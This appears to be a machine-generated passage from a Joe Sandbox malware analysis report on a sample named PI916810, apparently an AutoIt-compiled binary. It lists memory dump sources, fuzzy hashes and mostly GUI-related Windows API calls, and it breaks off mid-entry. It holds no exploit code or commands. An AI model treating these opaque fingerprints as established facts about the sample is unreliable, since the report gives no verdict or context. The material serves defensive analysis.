• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
• Opcode ID: 71aeadd0158b44d7e8e86b167174f00e576aa8dba86708eb3a83180cf1c2edd4
• Instruction ID: 51ff0e1a01cfbbf081207a3abe46e8077aa4027dd515349821deae30f1b3c4ad
• Opcode Fuzzy Hash: 71aeadd0158b44d7e8e86b167174f00e576aa8dba86708eb3a83180cf1c2edd4
• Instruction Fuzzy Hash: 72618171900248FFDF109FA5DC88EAEBB79EB08321F104126F911AB2A2D675AD40DB94
APIs
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 004E8D34
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004E8D45
• CharNextW.USER32(0000014E), ref: 004E8D74
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 004E8DB5
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 004E8DCB
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004E8DDC
• SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 004E8DF9
• SetWindowTextW.USER32(?,0000014E), ref: 004E8E45
• SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 004E8E5B
• SendMessageW.USER32(?,00001002,00000000,?), ref: 004E8E8C
• _memset.LIBCMT ref: 004E8EB1
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 004E8EFA
• _memset.LIBCMT ref: 004E8F59
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 004E8F83
• SendMessageW.USER32(?,00001074,?,00000001), ref: 004E8FDB
• SendMessageW.USER32(?,0000133D,?,?), ref: 004E9088
• InvalidateRect.USER32(?,00000000,00000001), ref: 004E90AA
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004E90F4
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004E9121
• DrawMenuBar.USER32(?), ref: 004E9130
• SetWindowTextW.USER32(?,0000014E), ref: 004E9158
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
• String ID: 0
• API String ID: 1073566785-4108050209
• Opcode ID: ebacc501cf2920c7e8a23c87a9fa185e085c08743ea8c6483ec9b0194bda6567
• Instruction ID: dce6b0ef0d90e3afe0d2f7513faf59938169285134b38a1bdccbe6fc50b1a9a8
• Opcode Fuzzy Hash: ebacc501cf2920c7e8a23c87a9fa185e085c08743ea8c6483ec9b0194bda6567
• Instruction Fuzzy Hash: D4E1E570900289ABDF20DF62CC84EEF7B78EF05715F10415BF9199A291DB788A46CF69
APIs
• GetCursorPos.USER32(?), ref: 004E4C51
• GetDesktopWindow.USER32 ref: 004E4C66
• GetWindowRect.USER32(00000000), ref: 004E4C6D
• GetWindowLongW.USER32(?,000000F0), ref: 004E4CCF
• DestroyWindow.USER32(?), ref: 004E4CFB
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004E4D24
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004E4D42
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004E4D68
• SendMessageW.USER32(?,00000421,?,?), ref: 004E4D7D
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004E4D90
• IsWindowVisible.USER32(?), ref: 004E4DB0
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 004E4DCB
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 004E4DDF
• GetWindowRect.USER32(?,?), ref: 004E4DF7
• MonitorFromPoint.USER32(?,?,00000002), ref: 004E4E1D
• GetMonitorInfoW.USER32(00000000,?), ref: 004E4E37
• CopyRect.USER32(?,?), ref: 004E4E4E
• SendMessageW.USER32(?,00000412,00000000), ref: 004E4EB9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                            • String ID: ($0$tooltips_class32
                                                                                                                                                                            • API String ID: 698492251-4156429822
                                                                                                                                                                            • Opcode ID: dc98ceb05fc526acecf58e82b8d80d074f35f2746e5e93cc00e8f91e22029f1d
                                                                                                                                                                            • Instruction ID: aa161ab30ba9088d236f9bf39792fb2c0273624bd5f07bbae8243b4dd2ba11ed
                                                                                                                                                                            • Opcode Fuzzy Hash: dc98ceb05fc526acecf58e82b8d80d074f35f2746e5e93cc00e8f91e22029f1d
                                                                                                                                                                            • Instruction Fuzzy Hash: A9B17D71604380AFDB04DF66C984B6BBBE4BF84314F00892EF5999B2A1D775EC05CB5A
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 004C46E8
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004C470E
• _wcscpy.LIBCMT ref: 004C473C
• _wcscmp.LIBCMT ref: 004C4747
• _wcscat.LIBCMT ref: 004C475D
• _wcsstr.LIBCMT ref: 004C4768
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 004C4784
• _wcscat.LIBCMT ref: 004C47CD
• _wcscat.LIBCMT ref: 004C47D4
• _wcsncpy.LIBCMT ref: 004C47FF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 699586101-1459072770
• Opcode ID: 2a9310a0a9805bd495a013bf0e7984e28dedb4a72cedbc0a1cd7e9f8aead4d24
• Instruction ID: 99b197aa4be24b9beccfb7e91e7f6a47c107933ce1780fab74f025b52910d46a
• Opcode Fuzzy Hash: 2a9310a0a9805bd495a013bf0e7984e28dedb4a72cedbc0a1cd7e9f8aead4d24
• Instruction Fuzzy Hash: D341F579A002107AE711BA668D42FBF776CEF81710F10446FFA05A6182EB7C9A0197BD
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004628BC
• GetSystemMetrics.USER32(00000007), ref: 004628C4
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004628EF
• GetSystemMetrics.USER32(00000008), ref: 004628F7
• GetSystemMetrics.USER32(00000004), ref: 0046291C
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00462939
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00462949
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0046297C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00462990
• GetClientRect.USER32(00000000,000000FF), ref: 004629AE
• GetStockObject.GDI32(00000011), ref: 004629CA
• SendMessageW.USER32(00000000,00000030,00000000), ref: 004629D5
  • Part of subcall function 00462344: GetCursorPos.USER32(?), ref: 00462357
  • Part of subcall function 00462344: ScreenToClient.USER32(005267B0,?), ref: 00462374
  • Part of subcall function 00462344: GetAsyncKeyState.USER32(00000001), ref: 00462399
  • Part of subcall function 00462344: GetAsyncKeyState.USER32(00000002), ref: 004623A7
• SetTimer.USER32(00000000,00000000,00000028,00461256), ref: 004629FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 06a55b7e26007117944f9af064645c8eb17821534e4b5dc2505ab63370da682a
• Instruction ID: 98533a7104da0ddfc4db3179280ba180d64a0eac92a8a77a4c5b3b2e2b2b3ab9
• Opcode Fuzzy Hash: 06a55b7e26007117944f9af064645c8eb17821534e4b5dc2505ab63370da682a
• Instruction Fuzzy Hash: E7B19371600249EFDB14DFA8DD85BAE7BB4FF08314F10422AFA15E7290DB789845CB59
APIs
• CharUpperBuffW.USER32(?,?), ref: 004E40F6
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004E41B6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 3974292440-719923060
• Opcode ID: df7ef4c5ed38dad87b2865a0d4deea9302bcc1d29c4fb007750a1cd027f0f8c4
• Instruction ID: f2afb333487116a553c4e08380f060bba5d72aeea3fd15cdf7e1b9e3f8faa277
• Opcode Fuzzy Hash: df7ef4c5ed38dad87b2865a0d4deea9302bcc1d29c4fb007750a1cd027f0f8c4
• Instruction Fuzzy Hash: 5CA1B6303143419BDB14EF12C851A6EB7E5BF84318F14496EB8965B3D2EB78EC06CB5A
APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 004D5309
• LoadCursorW.USER32(00000000,00007F8A), ref: 004D5314
• LoadCursorW.USER32(00000000,00007F00), ref: 004D531F
• LoadCursorW.USER32(00000000,00007F03), ref: 004D532A
• LoadCursorW.USER32(00000000,00007F8B), ref: 004D5335
• LoadCursorW.USER32(00000000,00007F01), ref: 004D5340
• LoadCursorW.USER32(00000000,00007F81), ref: 004D534B
• LoadCursorW.USER32(00000000,00007F88), ref: 004D5356
• LoadCursorW.USER32(00000000,00007F80), ref: 004D5361
• LoadCursorW.USER32(00000000,00007F86), ref: 004D536C
• LoadCursorW.USER32(00000000,00007F83), ref: 004D5377
• LoadCursorW.USER32(00000000,00007F85), ref: 004D5382
• LoadCursorW.USER32(00000000,00007F82), ref: 004D538D
• LoadCursorW.USER32(00000000,00007F84), ref: 004D5398
• LoadCursorW.USER32(00000000,00007F04), ref: 004D53A3
• LoadCursorW.USER32(00000000,00007F02), ref: 004D53AE
• GetCursorInfo.USER32(?), ref: 004D53BE
• GetLastError.KERNEL32(00000001,00000000), ref: 004D53E9
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Cursor$Load$ErrorInfoLast
• String ID:
                                                                                                                                                                            • API String ID: 3215588206-0
                                                                                                                                                                            • Opcode ID: 492bbc35f3c9ac852e790f30a9020b3ae670b04b3068063b89fd3e7e3305c7ab
                                                                                                                                                                            • Instruction ID: d35f7273ffff25dacc19c25531f5ac50f5489aa72fbb4dc246bb70218e59eab2
                                                                                                                                                                            • Opcode Fuzzy Hash: 492bbc35f3c9ac852e790f30a9020b3ae670b04b3068063b89fd3e7e3305c7ab
                                                                                                                                                                            • Instruction Fuzzy Hash: A4417370E043196ADB109FBA8C4996FFFF8EF51B10B10452FE509E7291DAB894018E65
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 004BAAA5
• __swprintf.LIBCMT ref: 004BAB46
• _wcscmp.LIBCMT ref: 004BAB59
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004BABAE
• _wcscmp.LIBCMT ref: 004BABEA
• GetClassNameW.USER32(?,?,00000400), ref: 004BAC21
• GetDlgCtrlID.USER32(?), ref: 004BAC73
• GetWindowRect.USER32(?,?), ref: 004BACA9
• GetParent.USER32(?), ref: 004BACC7
• ScreenToClient.USER32(00000000), ref: 004BACCE
• GetClassNameW.USER32(?,?,00000100), ref: 004BAD48
• _wcscmp.LIBCMT ref: 004BAD5C
• GetWindowTextW.USER32(?,?,00000400), ref: 004BAD82
• _wcscmp.LIBCMT ref: 004BAD96
  • Part of subcall function 0048386C: _iswctype.LIBCMT ref: 00483874
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
• String ID: %s%u
• API String ID: 3744389584-679674701
• Opcode ID: 5367aba0c7ff7bc65599e55e1fb1174c86016ca931f356a05671d85ba79cbfc5
• Instruction ID: b7ce65b4f6cbcd7ceceb3b39a930280b12053c7a3b5af873546e9f708c294393
• Opcode Fuzzy Hash: 5367aba0c7ff7bc65599e55e1fb1174c86016ca931f356a05671d85ba79cbfc5
• Instruction Fuzzy Hash: 07A1C271204346AFD714DF24C884BEBB7E9FF44315F00852EF9A982251D738E965CBAA
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 004BB3DB
• _wcscmp.LIBCMT ref: 004BB3EC
• GetWindowTextW.USER32(00000001,?,00000400), ref: 004BB414
• CharUpperBuffW.USER32(?,00000000), ref: 004BB431
• _wcscmp.LIBCMT ref: 004BB44F
• _wcsstr.LIBCMT ref: 004BB460
• GetClassNameW.USER32(00000018,?,00000400), ref: 004BB498
• _wcscmp.LIBCMT ref: 004BB4A8
• GetWindowTextW.USER32(00000002,?,00000400), ref: 004BB4CF
• GetClassNameW.USER32(00000018,?,00000400), ref: 004BB518
• _wcscmp.LIBCMT ref: 004BB528
• GetClassNameW.USER32(00000010,?,00000400), ref: 004BB550
• GetWindowRect.USER32(00000004,?), ref: 004BB5B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: 41f65130be26d25daacd1a9c5d8da541932ab2354cbf174567964b3b9039673b
• Instruction ID: 3a40c3501193693a1821aa90f9aab060c356a832508a4505360964e24f743748
• Opcode Fuzzy Hash: 41f65130be26d25daacd1a9c5d8da541932ab2354cbf174567964b3b9039673b
• Instruction Fuzzy Hash: 9981B0710043059BDB10DF11C885FAB77E8FF44718F04856AFD858A192DBB8DD4ACBAA
APIs
  • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
• DragQueryPoint.SHELL32(?,?), ref: 004EC917
  • Part of subcall function 004EADF1: ClientToScreen.USER32(?,?), ref: 004EAE1A
  • Part of subcall function 004EADF1: GetWindowRect.USER32(?,?), ref: 004EAE90
  • Part of subcall function 004EADF1: PtInRect.USER32(?,?,004EC304), ref: 004EAEA0
• SendMessageW.USER32(?,000000B0,?,?), ref: 004EC980
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004EC98B
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004EC9AE
• _wcscat.LIBCMT ref: 004EC9DE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 004EC9F5
• SendMessageW.USER32(?,000000B0,?,?), ref: 004ECA0E
• SendMessageW.USER32(?,000000B1,?,?), ref: 004ECA25
• SendMessageW.USER32(?,000000B1,?,?), ref: 004ECA47
• DragFinish.SHELL32(?), ref: 004ECA4E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 004ECB41
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$prR
• API String ID: 169749273-1452044432
• Opcode ID: 03d18c309ae159fb54cd122445e010214820299535bda3a52e19a9b33a185f2a
• Instruction ID: 156ff8b811eac96aeaa7e9e18befb12f72240b15050e83b3272306d71b95e48a
• Opcode Fuzzy Hash: 03d18c309ae159fb54cd122445e010214820299535bda3a52e19a9b33a185f2a
• Instruction Fuzzy Hash: CB61BD71108380AFC700DF65DC85D9FBBE8FF89714F000A2EF591961A2EB749A49CB56
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: ab43ea4c994506ed57bd04b3dd1bded29e8834475aaaac4771f5e90952497f5a
• Instruction ID: 730592a2e9de5325f10901536e186da80e08b824469b9a61b21a5f574dbb3ce4
• Opcode Fuzzy Hash: ab43ea4c994506ed57bd04b3dd1bded29e8834475aaaac4771f5e90952497f5a
• Instruction Fuzzy Hash: F731C730604205A6EB18FA62CD67EEE7BA4EF10B54F60051FB441711D1FF996E04C5AE
APIs
• LoadIconW.USER32(00000063), ref: 004BC4D4
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004BC4E6
• SetWindowTextW.USER32(?,?), ref: 004BC4FD
• GetDlgItem.USER32(?,000003EA), ref: 004BC512
• SetWindowTextW.USER32(00000000,?), ref: 004BC518
• GetDlgItem.USER32(?,000003E9), ref: 004BC528
• SetWindowTextW.USER32(00000000,?), ref: 004BC52E
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004BC54F
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004BC569
• GetWindowRect.USER32(?,?), ref: 004BC572
• SetWindowTextW.USER32(?,?), ref: 004BC5DD
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 004BC5E3
                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004BC5EA
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 004BC636
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004BC643
                                                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 004BC668
                                                                                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004BC693
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3869813825-0
                                                                                                                                                                            • Opcode ID: da7b49cda4b754a6fa37d20c4d69756addb3041e08509121543615ceb353d109
                                                                                                                                                                            • Instruction ID: 5d82981eb987effe17824b8c7e910c92c513717dbe606dc0f0e6b6bf0e964fe5
                                                                                                                                                                            • Opcode Fuzzy Hash: da7b49cda4b754a6fa37d20c4d69756addb3041e08509121543615ceb353d109
                                                                                                                                                                            • Instruction Fuzzy Hash: 09516E70900709AFDB209FA8DDC5BAFBBF5FF04705F004929E686A66A1C774A905CB54
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004EA4C8
                                                                                                                                                                            • DestroyWindow.USER32(?,?), ref: 004EA542
                                                                                                                                                                              • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 004EA5BC
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 004EA5DE
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004EA5F1
                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 004EA613
                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00460000,00000000), ref: 004EA64A
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004EA663
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 004EA67C
                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004EA683
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004EA69B
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 004EA6B3
                                                                                                                                                                              • Part of subcall function 004625DB: GetWindowLongW.USER32(?,000000EB), ref: 004625EC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                                            • String ID: 0$tooltips_class32
                                                                                                                                                                            • API String ID: 1297703922-3619404913
                                                                                                                                                                            • Opcode ID: 2842a5317bad1046401761321e3f240188156ac8721942d36172a92103b2593a
                                                                                                                                                                            • Instruction ID: d4b688bd441193bb89ab6c411aeb6aa7bfee78c4c30648a0fd892e62a3d77767
                                                                                                                                                                            • Opcode Fuzzy Hash: 2842a5317bad1046401761321e3f240188156ac8721942d36172a92103b2593a
                                                                                                                                                                            • Instruction Fuzzy Hash: 4171AD70140285AFD720CF29CC49F677BE5FB99304F08492EF985872A1D778E95ACB1A
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 004E46AB
